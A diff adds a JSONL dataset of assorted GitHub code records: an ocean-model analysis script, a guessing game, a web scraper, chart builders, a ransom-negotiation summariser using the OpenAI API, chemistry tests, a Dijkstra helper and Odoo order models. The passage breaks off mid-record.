diff --git "a/2985.jsonl" "b/2985.jsonl"
new file mode 100644--- /dev/null
+++ "b/2985.jsonl"
@@ -0,0 +1,1863 @@
+{"seq_id":"72767799271","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport MITgcmutils as mit\n\nplt.ion()\n\n#dir0 = '/home/bderembl/work/MITgcm/myrun/test_kw_energetics/run/'\ndir0 = '/media/bderembl/workd/MITgcm/myrun/test_kw_energetics/run03/'\ndir1 = dir0 + 'mnc*/'\ndir2 = dir0 + 'mnc_test_0001/'\n\nfile0 = 'grid.t*'\nfile1 = 'state.*'\nfile2 = 'oceDiag.*'\n\nalphat = 2e-4\ngo = 9.81\n\n# grid\nf0 = mit.mnc_files(dir1 + file0)\n\nRC = f0.variables['RC'][:]\nDRC = f0.variables['drC'][:]\nDRF = f0.variables['drF'][:]\nRF = f0.variables['RF'][:]\n\nXC = f0.variables['XC'][:,:]\nYC = f0.variables['YC'][:,:]\n\nsi_y,si_x = XC.shape\nsi_z = RC.size\n\ndx = XC[1,1] - XC[0,0]\ndy = YC[1,1] - YC[0,0]\ndz = RC[1] - RC[0]\n\ndv = np.abs(dx*dy*dz)\n\nf2 = mit.mnc_files(dir1 + file2)\nT = f2.variables['T'][:]\nsi_t = len(T)\n\n# compute KE, PE\ncirc = np.zeros((si_t))\n\nfor nt in range (0,si_t):\n rv = f2.variables['momVort3'][nt,0,:si_y,:si_x]\n\n circ[nt] = np.sum(np.sum(rv,0),0)\n\n\ncirc = circ/(si_y*si_x)\n\nTd = T/86400\n\nnp.savetxt('mit_rv.dat',circ)\n\n\nplt.figure()\nplt.plot(T,circ[:],'k')\n\n","repo_name":"bderembl/mitgcm_configs","sub_path":"qg_kelvin/analysis/pv_budget.py","file_name":"pv_budget.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"74407160550","text":"from random import *\r\nfrom colorama import Fore, init\r\ninit()\r\n\r\nprint(Fore.GREEN)\r\nmyName = input('Привет! Как тебя зовут? ') # знакомимся с пользователем\r\nnumber = randint(1, 100)\r\nguessTaken = 0 # переменная хранит значения попыток пользователя\r\n\r\nprint(Fore.CYAN, f'{myName}, я загадал число от 1 до 100. Твоя задача угадать это число.')\r\n\r\n\r\nfor guessTaken in range(7): # считаем количество попыток\r\n print('Попробуй угадать.')\r\n guess = int(input('Вводи число: ')) # т.к. мы хотим получать только числа, сразу преобразуем тип данных\r\n\r\n if guess > number:\r\n print(guess, 'Слишком много!')\r\n print()\r\n\r\n if guess < number:\r\n print(guess, 'Слишком мало!')\r\n print()\r\n\r\n if guess == number:\r\n break\r\n\r\n\r\ndef getEnding(guessTaken):\r\n lastChars = guessTaken % 100\r\n\r\n if 2 <= lastChars <= 4:\r\n return 'ки'\r\n else:\r\n lastChars = guessTaken % 10\r\n if lastChars == 1:\r\n return 'ку'\r\n elif lastChars >= 5 <= 20:\r\n return 'ок'\r\n\r\n\r\nif guess == number:\r\n print(f'Поздравляю, {myName}, ты угадал число за {guessTaken + 1} попыт{getEnding(guessTaken)}.')\r\n\r\nif guess != number:\r\n print('К сожалению, тебе не удалось угадать. Я загадал число: ', number, '.')\r\n\r\n","repo_name":"GreatRaksin/GuessTheNumber","sub_path":"guessLevelProColorama.py","file_name":"guessLevelProColorama.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"39024426385","text":"import requests\nimport pandas as pd\nimport numpy as np\nimport re\nfrom bs4 import BeautifulSoup\n\n\nclass Scraper:\n def __init__(self, url, reqs=None, soup=None):\n self.url = url\n self.reqs = requests.get(self.url)\n self.soup = BeautifulSoup(self.reqs.text, 'html.parser')\n\n def is_clean(self, link):\n glitch_words = [\"twitter\", \"facebook\", \"pib.gov.in\",\n \"t.co\", \"whatsapp\", \"google\", \"linkedin\"]\n for g_word in glitch_words:\n if g_word in link:\n return False\n return True\n\n def scrape_links(self):\n urls = []\n for link in self.soup.find_all('a'):\n if self.is_clean(link.get('href')):\n urls.append(link.get('href'))\n return urls\n\n\n# SCRAPING TABLES FROM WEBPAGE {SETTING THE ANCHOR AND REVERSE ITERATING}\n\n\n def scrape_tables(self):\n page = pd.read_html(self.url)\n tables = []\n for table in range(int(len(page)/2)):\n df = page[table]\n Array2d = df.to_numpy()\n Array2d = Array2d\n temp_table = Array2d.tolist()\n tables.append(temp_table)\n return tables\n\n def scrape_images(self):\n image_data = []\n images = self.soup.select('img')\n for image in images:\n src = image.get('src')\n image_data.append(src)\n final_image_data = list(set(image_data))\n return final_image_data\n\n def preprocess(self, hs):\n remove_space = re.sub(' +', ' ', hs)\n remove_n = re.sub('\\n', '', remove_space)\n remove_r = re.sub('\\r', '', remove_n)\n return remove_r\n\n def scrape_text(self):\n final_text = []\n page = pd.read_html(self.url)\n try:\n SOUP = self.soup\n for data in SOUP('tbody'):\n data.decompose()\n hs = SOUP.text\n except:\n hs = self.soup.text\n print('soup:', hs)\n final_text = self.preprocess(hs)\n val0 = re.search(\"Posted On\", final_text).span()[1]+34\n val = re.search(\"\\*\\*\", final_text).span()[0]\n return [final_text[val0:val]]\n\n def scrape_page(self):\n text = self.scrape_text()\n assets = {}\n images = self.scrape_images()\n tables = self.scrape_tables()\n imp_links = self.scrape_links()\n exported_data = {}\n assets = {\"images\": images, \"tables\": tables, \"imp_links\": imp_links}\n exported_data.update({\"text\": text[0]})\n exported_data.update({\"assets\": assets})\n exported_data.update({\"link\": self.url})\n print(exported_data)\n return exported_data\n","repo_name":"saar-official/scraper","sub_path":"scraper/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"5021771911","text":"\"\"\"Class methods for report charts.\"\"\"\n\n# Standard Python Libraries\nimport os\n\n# Third-Party Libraries\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MaxNLocator\n\nmatplotlib.use(\"Agg\")\n\n\n# Factor to convert cm to inches\nCM_CONVERSION_FACTOR = 2.54\n\n# Get base directory to save images\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\n\n\nclass Charts:\n \"\"\"Build charts.\"\"\"\n\n def __init__(self, df, width, height, name, title, x_label, y_label):\n \"\"\"Initialize chart class.\"\"\"\n self.df = df\n self.title = title\n self.x_label = x_label\n self.y_label = y_label\n self.width = width\n self.height = height\n self.name = name\n\n def pie(self):\n \"\"\"Build pie chart.\"\"\"\n df = self.df\n width = self.width\n height = self.height\n name = self.name\n plt.rcParams.update({\"figure.max_open_warning\": 0})\n category_name = df.columns[0]\n value_name = df.columns[1]\n df = df.sort_values(by=value_name, ascending=False)\n category_column = df[category_name]\n value_column = df[df.columns[1]]\n labels = category_column\n plt.gca().axis(\"equal\")\n\n def autopct(pct):\n \"\"\"Get percentages for the pie chart slices > 10%.\"\"\"\n return (\"%1.0f%%\" % pct) if pct > 1 else \"\"\n\n pie = plt.pie(\n value_column,\n startangle=0,\n radius=1,\n autopct=autopct,\n textprops={\"color\": \"w\", \"fontsize\": 7},\n )\n plt.legend(\n pie[0],\n labels,\n bbox_to_anchor=(1, 0.5),\n loc=\"center right\",\n fontsize=7,\n bbox_transform=plt.gcf().transFigure,\n frameon=False,\n )\n plt.subplots_adjust(left=0.2, wspace=0.2)\n plt.gcf().set_size_inches(\n width / CM_CONVERSION_FACTOR, height / CM_CONVERSION_FACTOR\n )\n plt.savefig(\n BASE_DIR + \"/assets/\" + name, transparent=True, dpi=500, bbox_inches=\"tight\"\n )\n plt.clf()\n\n def stacked_bar(self):\n \"\"\"Build stacked bar chart.\"\"\"\n df = self.df\n title = self.title\n x_label = self.x_label\n y_label = self.y_label\n width = self.width\n height = self.height\n name = self.name\n color = [\"#1357BE\", \"#D0342C\"]\n df.plot(kind=\"bar\", stacked=True, zorder=3, color=color)\n # Add title to chart\n plt.title(title, pad=15, fontsize=10)\n # Format chart's axis\n plt.xlabel(x_label, labelpad=10, fontdict={\"size\": 8})\n plt.ylabel(y_label, labelpad=10, fontdict={\"size\": 8})\n plt.gca().yaxis.set_major_locator(MaxNLocator(integer=True))\n plt.rc(\"axes\", axisbelow=True)\n plt.grid(axis=\"y\", zorder=0)\n plt.xticks(rotation=0)\n plt.ylim(ymin=0)\n # Set sizing for image\n plt.gcf().set_size_inches(\n width / CM_CONVERSION_FACTOR, height / CM_CONVERSION_FACTOR\n )\n plt.tight_layout()\n # Save chart to assets directory\n plt.savefig(BASE_DIR + \"/assets/\" + name, transparent=True, dpi=500)\n plt.clf()\n\n def h_bar(self):\n \"\"\"Build horizontal bar chart.\"\"\"\n df = self.df\n x_label = self.x_label\n y_label = self.y_label\n width = self.width\n height = self.height\n name = self.name\n plt.rcParams.update({\"figure.max_open_warning\": 0})\n category_name = df.columns[0]\n value_name = df.columns[1]\n category_column = df[category_name].str.replace(\"Vulnerable Product - \", \"\")\n value_column = df[df.columns[1]]\n bar_width = 0.6\n fig, ax = plt.subplots()\n ax.spines.right.set_visible(False)\n ax.spines.top.set_visible(False)\n # Generate horizontal bar chart\n plt.barh(df.index, value_column, bar_width, align=\"center\", color=\"#466fc6\")\n # Specify axis atributes\n plt.xticks(fontsize=7)\n plt.yticks(fontsize=7)\n plt.xlim(xmin=0)\n plt.gca().xaxis.set_major_locator(MaxNLocator(integer=True))\n plt.gca().set_ylim(-1.0, len(category_column))\n plt.gca().set_yticks(df.index)\n plt.gca().set_yticklabels(category_column)\n plt.gca().set_xlabel(x_label, fontdict={\"size\": 8})\n plt.gca().set_ylabel(y_label)\n # Set sizing for image\n plt.gcf().set_size_inches(\n width / CM_CONVERSION_FACTOR, height / CM_CONVERSION_FACTOR\n )\n plt.tight_layout()\n # Add data labels to each bar if greater than 0\n for i in range(len(df)):\n if df.loc[i, value_name] > 0:\n label = df.loc[i, value_name]\n plt.annotate(\n label, # this is the text\n (df.loc[i, value_name], i), # this is the point to label\n textcoords=\"offset points\", # how to position the text\n xytext=(7, -3), # distance from text to points (x,y)\n ha=\"center\", # horizontal alignment can be left, right or center\n fontsize=8,\n )\n # Save chart to assets directory\n plt.savefig(\n BASE_DIR + \"/assets/\" + name, transparent=True, dpi=500, bbox_inches=\"tight\"\n )\n plt.clf()\n\n def line_chart(self):\n \"\"\"Build line chart.\"\"\"\n df = self.df\n x_label = self.x_label\n y_label = self.y_label\n width = self.width\n height = self.height\n name = self.name\n color = [\"#7aa5c1\", \"#e08493\"]\n fig, ax = plt.subplots()\n ax.spines[\"right\"].set_visible(False)\n ax.spines[\"top\"].set_visible(False)\n plt.set_loglevel(\"WARNING\")\n # Plot first line on chart\n plt.plot(\n df.index,\n df[df.columns[0]],\n color=color[0],\n label=df.columns[0],\n linewidth=3,\n marker=\".\",\n markersize=10,\n )\n # If there is another column chart the second line\n if len(df.columns) == 2:\n plt.plot(\n df.index,\n df[df.columns[1]],\n color=color[1],\n label=df.columns[1],\n linewidth=3,\n linestyle=\"dashed\",\n marker=\".\",\n markersize=10,\n )\n # Set the y-max to 110% of the max y value\n y_max = int(df[df.columns].max().max() * 1.1)\n plt.ylim(ymin=0, ymax=y_max * 1.10)\n # Place the legend in the upper right corner\n plt.legend(loc=\"upper right\")\n # Set size of the chart\n plt.gcf().set_size_inches(\n width / CM_CONVERSION_FACTOR, height / CM_CONVERSION_FACTOR\n )\n # Format tick marks and grid layout\n plt.xticks(fontsize=7)\n plt.yticks(fontsize=7)\n plt.gca().set_ylabel(y_label, labelpad=10, fontdict={\"size\": 8})\n plt.xlabel(x_label, labelpad=10, fontdict={\"size\": 8})\n plt.xticks(rotation=0)\n plt.grid(axis=\"y\")\n plt.tight_layout()\n\n # Add data labels\n # Loop through the dataframe\n for row in df.itertuples():\n # Check if there is only one row of values\n if len(row) == 2:\n plt.annotate(\n str(int(row[1])),\n xy=(row[0], row[1]),\n textcoords=\"offset points\", # Set the manner to position the text\n xytext=(\n 0,\n 8,\n ), # Distance from text to points (x,y)\n ha=\"center\", # Set horizontal alignment to center\n color=\"#003e67\",\n )\n # Check if there are two rows of data\n elif len(row) == 3:\n # Check if the two values are within 1/10th of the max y value\n value_diff = abs(row[1] - row[2])\n if value_diff < y_max / 10:\n # If the values are on the bottom quarter of the graph don't label below values\n if min(row[1], row[2]) < y_max / 4:\n y1 = y2 = max(row[1], row[2])\n if row[1] > row[2]:\n y1_offset = 18\n y2_offset = 8\n else:\n y1_offset = 8\n y2_offset = 18\n # If the values are not in the bottom quarter place the lower value below the point\n else:\n y1 = row[1]\n y2 = row[2]\n if row[1] > row[2]:\n y1_offset = 8\n y2_offset = -17\n else:\n y1_offset = -17\n y2_offset = 8\n # If values are not close to each other put the labels directly above the value\n else:\n y1 = row[1]\n y2 = row[2]\n y1_offset = 8\n y2_offset = 8\n\n # Annotate the data points\n plt.annotate(\n str(int(row[1])),\n xy=(row[0], y1),\n textcoords=\"offset points\", # Set how to position the text\n xytext=(\n 0,\n y1_offset,\n ), # Distance from text to points (x,y)\n ha=\"center\", # Horizontal alignment can be left, right or center\n color=\"#005288\",\n )\n plt.annotate(\n str(int(row[2])),\n xy=(row[0], y2),\n textcoords=\"offset points\", # Set how to position the text\n xytext=(\n 0,\n y2_offset,\n ), # Distance from text to points (x,y)\n ha=\"center\", # Set horizontal alignment to center\n # fontsize=2,\n color=\"#c41230\",\n )\n # Save chart to assets directory\n plt.savefig(\n BASE_DIR + \"/assets/\" + name, transparent=True, dpi=500, bbox_inches=\"tight\"\n )\n plt.clf()\n","repo_name":"cisagov/pe-reports","sub_path":"src/pe_reports/charts.py","file_name":"charts.py","file_ext":"py","file_size_in_byte":10390,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"71"}
+{"seq_id":"34430011391","text":"import json\nimport openai\nimport argparse\nimport os\nfrom dotenv import load_dotenv\n\n# Load OpenAI API key from .env file\nload_dotenv()\nopenai.api_key = os.getenv('OPENAI_API_KEY')\n\ndef read_json_file(filename):\n \"\"\"Read a JSON file and return its contents.\"\"\"\n with open(filename, 'r') as file:\n return json.load(file)\n\ndef ask_openai(question, content):\n \"\"\"Ask a question to ChatGPT using the OpenAI API.\"\"\"\n response = openai.Completion.create(\n engine=\"text-davinci-002\",\n prompt=f\"{content}\\n\\n{question}\",\n max_tokens=150\n )\n return response.choices[0].text.strip()\n\ndef extract_details_from_json(json_content):\n \"\"\"Ask ChatGPT about details in the JSON content.\"\"\"\n # Extract ransom demand\n ransom_demand_question = \"How much was the ransom demand, answer only the figure of the amount?\"\n ransom_demand = ask_openai(ransom_demand_question, json_content)\n print(f\"Ransom Demand: {ransom_demand}\")\n\n # Extract negotiated ransom\n negotiated_ransom_question = \"How much was the negotiated ransom, answer only the figure of the amount?\"\n negotiated_ransom = ask_openai(negotiated_ransom_question, json_content)\n print(f\"Negotiated Ransom: {negotiated_ransom}\")\n\n # Check if victim paid the ransom\n paid_ransom_question = \"Did the victim pay the ransom, answer only yes or no?\"\n paid_ransom = ask_openai(paid_ransom_question, json_content)\n print(f\"Paid Ransom: {paid_ransom}\")\n\ndef main():\n parser = argparse.ArgumentParser(description='Ask questions about a provided JSON file using ChatGPT.')\n parser.add_argument('filename', help='Path to the JSON file.')\n\n args = parser.parse_args()\n json_content = read_json_file(args.filename)\n extract_details_from_json(str(json_content))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JMousqueton/ransomware.live","sub_path":"analyse_negotiation.py","file_name":"analyse_negotiation.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"71"}
+{"seq_id":"72230741669","text":"import pandas as pd\nimport pytest\nfrom fluids.numerics import assert_close, assert_close1d, assert_close2d\n\nfrom chemicals.heat_capacity import CRC_standard_data, TRC_gas_data\nfrom chemicals.reaction import (\n Gibbs_formation,\n Hf_basis_converter,\n Hfg,\n Hfg_all_methods,\n Hfg_API_TDB_data,\n Hfg_ATcT_data,\n Hfg_methods,\n Hfg_S0g_YAWS_data,\n Hfl,\n Hfl_ATcT_data,\n Hfl_methods,\n Hfs,\n Hfs_methods,\n S0g,\n S0g_all_methods,\n S0g_methods,\n S0l,\n S0l_methods,\n S0s,\n S0s_methods,\n balance_stoichiometry,\n entropy_formation,\n standard_formation_reaction,\n stoichiometric_matrix,\n)\n\n\ndef test_API_TDB_data():\n assert Hfg_API_TDB_data['Hfg'].abs().sum() == 101711260\n assert Hfg_API_TDB_data.shape == (571, 2)\n\n\ndef test_ATcT_l():\n assert Hfl_ATcT_data.shape == (34,5)\n tots_calc = [Hfl_ATcT_data[i].abs().sum() for i in ['Hfl_0K', 'Hfl', 'uncertainty']]\n tots = [2179500.0, 6819443, 19290]\n assert_close1d(tots_calc, tots)\n\n\ndef test_Hfg_ATcT_data():\n assert Hfg_ATcT_data.shape == (595, 5)\n tots_calc = [Hfg_ATcT_data[i].abs().sum() for i in ['Hfg_0K', 'Hfg', 'uncertainty']]\n tots = [300788330, 300592764, 829204]\n assert_close1d(tots_calc, tots)\n\ndef test_Hfg_API_TDB_data():\n assert_close(Hfg('7732-18-5', method='API_TDB_G'), -241820.0)\n\n assert Hfg_methods('7732-18-5') == ['ATCT_G', 'CRC', 'API_TDB_G', 'WEBBOOK', 'TRC', 'JANAF', 'YAWS']\n\n assert None is Hfg('98-00-1')\n\n with pytest.raises(Exception):\n Hfg('98-00-0', method='BADMETHOD')\n\n@pytest.mark.slow\ndef test_Hfg_API_TDB_data_fuzz():\n tot = sum([abs(Hfg(i, method='API_TDB_G')) for i in Hfg_API_TDB_data.index])\n assert_close(tot, 101711260.0)\n\n\ndef test_Hfl():\n Hfs = [Hfl('67-56-1'), Hfl('67-56-1', method='ATCT_L')]\n assert_close1d(Hfs, [-238400.0]*2)\n\n assert Hfl_methods('67-56-1') == ['ATCT_L', 'CRC', 'WEBBOOK']\n assert None is Hfl('98-00-1')\n\n tot = sum([abs(Hfl(i)) for i in Hfl_ATcT_data.index])\n assert_close(tot, 6819443.0)\n\n with pytest.raises(Exception):\n Hfl('98-00-0', method='BADMETHOD')\n\n\ndef test_Hfg():\n # default method ATCT_G\n assert_close(Hfg('7732-18-5'), -241822.0)\n\n Hfs = [Hfg('67-56-1', method=i) for i in Hfg_all_methods]\n assert_close1d(Hfs, [-200700.0, -190100.0, -201000.0, -205000.0, None, -200900.0, -216200.0])\n\n assert Hfg_methods('67-56-1') == ['ATCT_G', 'CRC', 'API_TDB_G', 'WEBBOOK', 'TRC', 'YAWS', 'JOBACK']\n assert_close(-211800.0, Hfg('98-00-0'))\n\n with pytest.raises(Exception):\n Hfg('98-00-0', method='BADMETHOD')\n\ndef test_Hfs():\n assert_close(Hfs('101-81-5'), 71500)\n assert_close(Hfs('101-81-5', method='CRC'), 71500)\n assert ['CRC', 'WEBBOOK'] == Hfs_methods('101-81-5')\n\n\n\n@pytest.mark.fuzz\n@pytest.mark.slow\ndef test_Hfg_all_values():\n tot1 = sum([abs(Hfg(i, method='TRC')) for i in TRC_gas_data.index[pd.notnull(TRC_gas_data['Hfg'])]])\n assert_close(tot1, 495689880.0)\n\n tot2 = sum([abs(Hfg(i, method='ATCT_G')) for i in Hfg_ATcT_data.index])\n assert_close(tot2, 300592764.0)\n\n tot3 = sum([abs(Hfg(i, method='YAWS')) for i in Hfg_S0g_YAWS_data.index[pd.notnull(Hfg_S0g_YAWS_data['Hfg'])]])\n assert_close(tot3, 1544220403.0)\n\n tot4 = sum([abs(Hfg(i, method='CRC')) for i in CRC_standard_data.index[pd.notnull(CRC_standard_data['Hfg'])]])\n assert_close(tot4, 392946600.0)\n\ndef test_S0g():\n S0s = [S0g('7732-18-5', method=i) for i in S0g_all_methods]\n assert_close1d(S0s, [188.8, 188.83842, 188.834, 188.84])\n\n assert S0g_methods('67-56-1') == ['CRC', 'YAWS']\n\n assert_close(239.9, S0g('67-56-1'))\n\n with pytest.raises(Exception):\n S0g('98-00-0', method='BADMETHOD')\n\n@pytest.mark.fuzz\n@pytest.mark.slow\ndef test_S0g_all_values():\n tot3 = sum([abs(S0g(i, method='YAWS')) for i in Hfg_S0g_YAWS_data.index[pd.notnull(Hfg_S0g_YAWS_data['S0g'])]])\n assert_close(tot3, 2690113.4130000058)\n\n tot4 = sum([abs(S0g(i, method='CRC')) for i in CRC_standard_data.index[pd.notnull(CRC_standard_data['S0g'])]])\n assert_close(tot4, 141558.30000000008)\n\n\ndef test_S0s():\n assert_close(S0s('7439-93-2'), 29.1) # Lithium\n assert_close(S0s('7439-93-2', method='CRC'), 29.1)\n\n methods = S0s_methods('7439-93-2')\n assert methods == ['CRC', 'WEBBOOK']\n\ndef test_S0l():\n assert_close(S0l('7439-97-6'), 75.9) # Lithium\n assert_close(S0l('7439-97-6', method='CRC'), 75.9)\n\n methods = S0l_methods('7439-97-6')\n assert methods == ['CRC', 'WEBBOOK']\n\ndef test_Gibbs_formation():\n Gf = Gibbs_formation(-285830.0, 69.91, [0.0, 0.0], [130.571, 205.147], [1.0, .5])\n assert_close(Gf, -237161.633825)\n\n Gf = Gibbs_formation(-241818, 188.825, [0.0, 0], [130.571, 205.147], [1.0, .5])\n assert_close(Gf, -228604.141075)\n\n Gf = Gibbs_formation(-648980, 297.713, [0.0, 0.0, 0.0], [5.74, 152.206, 202.789], [1, .5, 1.5])\n assert_close(Gf, -622649.329975)\n\n\ndef test_Hf_basis_converter():\n assert_close(Hf_basis_converter(44018.0, Hf_liq=-285830.0), -241812)\n\n assert_close(Hf_basis_converter(44018, Hf_gas=-241812.0), -285830)\n\n with pytest.raises(ValueError):\n Hf_basis_converter(44018, Hf_liq=None)\n with pytest.raises(ValueError):\n Hf_basis_converter(2000, Hf_gas=None, Hf_liq=None)\n with pytest.raises(ValueError):\n Hf_basis_converter(Hvapm=-1, Hf_liq=1)\n with pytest.raises(ValueError):\n Hf_basis_converter(Hvapm=None, Hf_liq=1)\n\ndef test_entropy_formation():\n Sf = entropy_formation(Hf=-74520.0, Gf=-50490.0)\n assert_close(Sf, -80.59701492537314)\n\n Sf = entropy_formation(Hf=-241818, Gf=-228572)\n assert_close(Sf, -44.427301693778304)\n\n\n\ndef test_balance_stoichiometry():\n test_cases = [\n [[{'Hg': 1, 'O': 1}, {'Hg': 1}, {'O': 2}], [True, False, False], [2.0, 2.0, 1.0]],\n [[{'Cl': 2}, {'C': 3, 'H': 6}, {'C': 3, 'Cl': 1, 'H': 5}, {'Cl': 1, 'H': 1}],\n [True, True, False, False, False],\n [1, 1, 1, 1]],\n [[{'Al': 1}, {'H': 1, 'N': 1, 'O': 3}, {'Al': 1, 'N': 3, 'O': 9}, {'N': 1, 'O': 1}, {'H': 2, 'O': 1}],\n [True, True, False, False, False],\n [1.0, 4.0, 1.0, 1.0, 2.0]],\n [[{'Fe': 1}, {'O': 2}, {'Fe':2, 'O': 3}], [True, True, False], [4.0, 3.0, 2.0]],\n [[{'N': 1, 'H': 3}, {'O': 2}, {'N': 1, 'O': 1}, {'H': 2, 'O': 1}], [True, True, False, False], [4.0, 5.0, 4.0, 6.0]],\n [[{'O': 2}, {'H': 2, 'O': 1}, {'C': 1, 'O': 2}, {'C': 6, 'H': 14}], [True, False, False, True], [19.0, 14.0, 12.0, 2.0]],\n\n ]\n\n for atomss, statuses, products in test_cases:\n assert_close1d(balance_stoichiometry(stoichiometric_matrix(atomss, statuses)), products)\n\n\ndef test_stoichiometric_matrix():\n res = stoichiometric_matrix([{'Mg': 1, 'O': 1}, {'Mg': 1}, {'O': 2}], [True, False, False])\n assert_close2d([[1, -1, 0], [1, 0, -2]], res)\n\n\ndef test_standard_formation_reaction():\n reactant_coeff, coeff_test, reactant_atomss_test = standard_formation_reaction({'C': 3, 'H': 8})\n assert coeff_test == [3.0, 4.0]\n assert reactant_atomss_test == [{'C': 1}, {'H': 2}]\n\n reactant_coeff, coeff_test, reactant_atomss_test = standard_formation_reaction({'C': 3, 'H': 7, 'N': 1, 'O': 2, 'S': 1})\n assert coeff_test == [6.0, 7.0, 1.0, 2.0, 2.0]\n assert reactant_atomss_test == [{'C': 1}, {'H': 2}, {'N': 2}, {'O': 2}, {'S': 1}]\n\n reactant_coeff, coeff_test, reactant_atomss_test = standard_formation_reaction({'C': 6, 'H': 7, 'B': 1, 'O': 2})\n assert coeff_test == [12.0, 7.0, 2.0, 2.0]\n assert reactant_atomss_test == [{'C': 1}, {'H': 2}, {'B': 1}, {'O': 2}]\n\n reactant_coeff, coeff_test, reactant_atomss_test = standard_formation_reaction({'C': 4, 'H': 12, 'Si': 1})\n assert coeff_test == [4.0, 6.0, 1.0]\n assert reactant_atomss_test == [{'C': 1}, {'H': 2}, {'Si': 1}]\n\n reactant_coeff, coeff_test, reactant_atomss_test = standard_formation_reaction({'C': 12, 'H': 10, 'Cl': 1, 'P': 1})\n assert coeff_test == [24.0, 10.0, 1.0, 2.0]\n assert reactant_atomss_test == [{'C': 1}, {'H': 2}, {'Cl': 2}, {'P': 1}]\n\n reactant_coeff, coeff_test, reactant_atomss_test = standard_formation_reaction({'C': 2, 'H': 4, 'Br': 1, 'F': 1})\n assert coeff_test == [4.0, 4.0, 1.0, 1.0]\n assert reactant_atomss_test == [{'C': 1}, {'H': 2}, {'Br': 2}, {'F': 2}]\n","repo_name":"CalebBell/chemicals","sub_path":"tests/test_reaction.py","file_name":"test_reaction.py","file_ext":"py","file_size_in_byte":8249,"program_lang":"python","lang":"en","doc_type":"code","stars":146,"dataset":"github-code","pt":"71"}
+{"seq_id":"71223671911","text":"def dijkstra(start, end, graph):\n\t\"\"\"\n\n\tInput: start node, end (list of nodes) and graph\n\tGraph: 2D list with node objects\n\tNode: value, previous, dist_source, neighbors, visited\n\tReturns: Nothing, just modified previous in nodes so that shortest path can be found from end.\n\tNote: Meant for matrices\n\n\t\"\"\"\n\tunvisited = [vertex for row in graph for vertex in row]\n\tcurrent = start\n\twhile True:\n\t\tif current in end or len(unvisited) == 0:\n\t\t\tbreak\n\t\tfor vertex in current.neighbors: #I think this checks neighbors that are visited as well.\n\t\t\tif vertex.visited == True:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tdistance = vertex.value + current.value + current.dist_source\n\t\t\t\tif distance < vertex.dist_source:\n\t\t\t\t\tvertex.dist_source = distance\n\t\t\t\t\tvertex.previous = current\n\t\tunvisited.remove(current)\n\t\tcurrent.visited = True\n\t\tcurrent = min(unvisited, key = lambda x: x.dist_source)\n\n\ndef path_sum(last_point, graph):\n\t\"\"\"\n\t\n\tInput: last point (starting here), graph\n\tGraph: 2D list with node objects\n\tNode: value, previous, dist_source, neighbors, visited\n\tReturns: The sum of the values in the shortest path (or any path)\n\tNote: Meant for matrices\n\n\t\"\"\"\n\tcurrent = last_point\n\tpath_sum = 0\n\twhile True:\n\t\t#print current.value\n\t\tpath_sum += current.value\n\t\tif not current.previous:\n\t\t\tbreak\n\t\tcurrent = current.previous\n\treturn path_sum\t\n","repo_name":"fugitiveinkc/Project_Euler","sub_path":"projecteuler_algorithms.py","file_name":"projecteuler_algorithms.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"13534589042","text":"from odoo import fields, models, api, _\n\n\nclass PackageOrder(models.Model):\n _name = 'package.order'\n _description = 'Description'\n\n name = fields.Char(default=_('New'), readonly=True, required=True)\n customer_id = fields.Many2one('res.partner', domain=[('is_company', '=', False)])\n address = fields.Text('Address', store=True)\n vendor_id = fields.Many2one('res.partner', domain=[('is_company', '=', True)])\n line_ids = fields.One2many('package.order.line', 'order_id', string='Lines')\n note = fields.Html()\n total = fields.Float('Total', compute=\"_compute_total\")\n customer_commission = fields.Float(\"Customer Commission\", compute=\"_compute_customer_commission\")\n refund_amount = fields.Float('Refund Amount', compute=\"_compute_refund_amount\")\n value_due = fields.Float(\"Value Due\", compute=\"_compute_value_due\")\n\n @api.onchange(\"customer_id\")\n def _change_address(self):\n for order in self:\n if order.customer_id:\n order.address = f'{order.customer_id.street} ' if order.customer_id.street else ''\n order.address += f'or {order.customer_id.street2} ' if order.customer_id.street2 else ''\n order.address += f', {order.customer_id.city}' if order.customer_id.city else ''\n order.address += f' in {order.customer_id.state_id.name}' if order.customer_id.state_id else ''\n else:\n order.address = ''\n\n\n @api.depends('total')\n def _compute_value_due(self):\n for order in self:\n order.value_due = order.total + (order.total * (order.customer_id.commission / 100))\n\n @api.depends('line_ids', 'customer_id')\n def _compute_total(self):\n for order in self:\n sum_line = 0\n for line in order.line_ids:\n sum_line += line.sub_total\n order.total = sum_line\n\n @api.depends('total', 'customer_id')\n def _compute_refund_amount(self):\n for order in self:\n order.refund_amount = order.value_due - (order.total * (order.customer_id.commission / 100))\n\n @api.depends('customer_id', 'total')\n def _compute_customer_commission(self):\n for order in self:\n order.customer_commission = order.total * (order.customer_id.commission / 100)\n\n @api.model\n def create(self, vals):\n # We generate a standard reference\n vals['name'] = self.env['ir.sequence'].next_by_code('package.order') or '/'\n return super(PackageOrder, self).create(vals)\n\n\nclass PackageOrderLine(models.Model):\n _name = 'package.order.line'\n\n order_id = fields.Many2one('package.order')\n product_id = fields.Many2one('product.product')\n quantity = fields.Integer('quantity', default=1)\n price = fields.Float('Price', related='product_id.lst_price')\n sub_total = fields.Float('Sub Total', compute=\"_compute_total\")\n\n @api.depends('product_id', 'quantity')\n def _compute_total(self):\n for line in self:\n line.sub_total = line.quantity * 